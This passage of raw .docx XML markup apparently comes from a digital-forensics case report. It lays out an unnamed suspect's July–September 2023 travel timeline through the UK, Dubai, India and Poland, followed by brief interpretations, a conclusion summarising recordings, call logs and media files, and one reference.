      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Following is the whole travel timeline of the suspect:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The suspect travels by coach from an unspecified airport in the United Kingdom to Dubai. They then fly from Dubai to Chennai on Emirates flight EK 542, arriving in Chennai by 3:49:04 AM on July 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 10:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visits Thazambedu (village), Paramankeni (village), and Bommayapalayam (beach) in Tamil Nadu, India.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 13:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Puducherry, India from 6:06:44 PM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 14:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Bengaluru, Karnataka, India at 2:25:36 PM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 17:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Traveling via train within India.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 26:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Chennai, Tamil Nadu, India early in the morning, followed by visits to various locations in Tirupati (temple), Andhra Pradesh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 29:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visits Vadavalli, Rayan, Sirukundra Upper Division, and Attakatti in Tamil Nadu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July 30:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Vellamalai Mattam and Coimbatore, with multiple stops in Attakatti.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7hqqya2x7qmq" w:id="97"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">August 2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">August 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Puducherry, India at 5:36:52 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="1c4587"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">August 14:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Chennai, Tamil Nadu, India at 7:25:23 PM, then travels on Emirates EK 547 from Chennai to Dubai, followed by a flight to an unspecified airport in the United Kingdom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">August 15:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Travels on National Express in the United Kingdom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">August 18:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses Chiltern Railways services in the United Kingdom.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nj00ht3btwl2" w:id="98"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> At Heathrow Central Bus Station.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> At Stansted Airport, London, United Kingdom in the morning, then travels from London to Poland.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Gdańsk, Poland in the evening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Gdańsk, Poland with timestamps throughout the day.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">September 11:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Takes a train to Paddington, then arrives in Swansea via train.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_22basjkson0z" w:id="99"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dubai as a Transit Hub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dubai appears to be used solely as a transit hub by the suspect, with their activities confined to the airport area. This suggests that their primary destinations of interest were elsewhere, specifically in India, the UK, and potentially Poland.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2elrvmgpzwoa" w:id="100"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Journey in Swansea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspect's journey concludes in Swansea, aligning with the indication that they are a UK resident.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gwocv7u77w89" w:id="101"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">India Travels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspect's thorough and diverse travels within India, including visits to multiple villages and cities in Tamil Nadu and Karnataka, as well as to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Puducherry</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Tirupati, are intriguing.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kbkq50oohei3" w:id="102"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequent Travel Between the UK and India</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The regular movement between the UK and India, culminating in the return to Swansea, suggests a pattern that could be linked to professional obligations.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_robgd5207njy" w:id="103"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit to Gdańsk, Poland</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspect's time spent in Gdańsk is particularly interesting.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ikmb5o4zdtdv" w:id="104"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation into the suspect's activities revealed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">23 audio recordings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> made between </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">July and September 2023</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with a notable concentration on specific dates in August and September, suggesting significant events or discussions on those days. Analysis of call logs identified several potentially suspicious calls, with the longest conversation being with an Indian number. The suspect's contact list indicates professional ties to the UK, confirmed by a UK work contact number. An examination of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 218 media files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided insights into an extensive travel pattern covering various locations within</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> India, the UK, Dubai, and Poland</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Notably, the suspect's presence in Dubai appears to be limited to transit, with their journey concluding in Swansea, UK, hinting at their residence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4jp1chh3e7f7" w:id="105"/>
      <w:bookmarkEnd w:id="105"/>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pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d4sjbde65xn8" w:id="106"/>
      <w:bookmarkEnd w:id="106"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] E. A. Gollub, "Recent trends in digital text forensics and its evaluation," in International Conference of the Cross-Language Evaluation Forum for European Languages, pp. 282-302, Sep. 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
